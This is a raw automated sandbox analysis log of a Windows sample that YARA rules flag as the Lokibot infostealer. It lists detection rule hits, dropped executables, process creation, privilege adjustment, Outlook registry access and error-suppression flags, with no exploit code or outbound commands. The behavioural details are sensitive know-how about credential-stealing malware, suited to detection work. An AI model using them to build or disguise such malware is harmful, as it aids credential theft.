            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: gblqfiy.exe PID: 5172, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: gblqfiy.exe PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00406D5F
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040E52C
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B08B7
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_004B0A34
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_0040549C
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_004029D4
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: String function: 00401A10 appears 36 times
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: String function: 00405B6F appears 42 times
            Source: zlP981oop5.exeVirustotal: Detection: 30%
            Source: C:\Users\user\Desktop\zlP981oop5.exeFile read: C:\Users\user\Desktop\zlP981oop5.exeJump to behavior
            Source: zlP981oop5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\zlP981oop5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\zlP981oop5.exe C:\Users\user\Desktop\zlP981oop5.exe
            Source: C:\Users\user\Desktop\zlP981oop5.exeProcess created: C:\Users\user\AppData\Local\Temp\gblqfiy.exe "C:\Users\user\AppData\Local\Temp\gblqfiy.exe" C:\Users\user\AppData\Local\Temp\rznkfgz.rq
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess created: C:\Users\user\AppData\Local\Temp\gblqfiy.exe C:\Users\user\AppData\Local\Temp\gblqfiy.exe
            Source: C:\Users\user\Desktop\zlP981oop5.exeProcess created: C:\Users\user\AppData\Local\Temp\gblqfiy.exe "C:\Users\user\AppData\Local\Temp\gblqfiy.exe" C:\Users\user\AppData\Local\Temp\rznkfgz.rq
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess created: C:\Users\user\AppData\Local\Temp\gblqfiy.exe C:\Users\user\AppData\Local\Temp\gblqfiy.exe
            Source: C:\Users\user\Desktop\zlP981oop5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Users\user\Desktop\zlP981oop5.exeFile created: C:\Users\user\AppData\Local\Temp\nsp2B7D.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/7@0/1
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\zlP981oop5.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: gblqfiy.exe, 00000003.00000003.257055027.0000000002237000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: zlP981oop5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\xampp\htdocs\b61e5acae9c94fab8e78397ab543d5d6\Loader\Release\Loader.pdb source: zlP981oop5.exe, 00000000.00000002.266742028.0000000002850000.00000004.00000800.00020000.00000000.sdmp, zlP981oop5.exe, 00000000.00000002.266467890.000000000040C000.00000004.00000001.01000000.00000003.sdmp, gblqfiy.exe, 00000001.00000000.247488143.000000000040F000.00000002.00000001.01000000.00000004.sdmp, gblqfiy.exe, 00000001.00000002.259531027.000000000040F000.00000002.00000001.01000000.00000004.sdmp, gblqfiy.exe, 00000003.00000000.250738909.000000000040F000.00000002.00000001.01000000.00000004.sdmp, nsk2BAD.tmp.0.dr, gblqfiy.exe.0.dr
            Source: Binary string: wntdll.pdbUGP source: gblqfiy.exe, 00000001.00000003.254805333.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gblqfiy.exe, 00000001.00000003.255029911.000000001A190000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: gblqfiy.exe, 00000001.00000003.254805333.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gblqfiy.exe, 00000001.00000003.255029911.000000001A190000.00000004.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 1.2.gblqfiy.exe.a00000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.gblqfiy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.gblqfiy.exe.a00000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.gblqfiy.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.512147236.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.259652732.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: gblqfiy.exe PID: 5172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: gblqfiy.exe PID: 5316, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00402AC0 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00402AC0 push eax; ret
            Source: gblqfiy.exe.0.drStatic PE information: section name: .00cfg
            Source: gblqfiy.exe.0.drStatic PE information: section name: .voltbl
            Source: C:\Users\user\Desktop\zlP981oop5.exeFile created: C:\Users\user\AppData\Local\Temp\gblqfiy.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\zlP981oop5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeProcess information set: NOGPFAULTERRORBOX
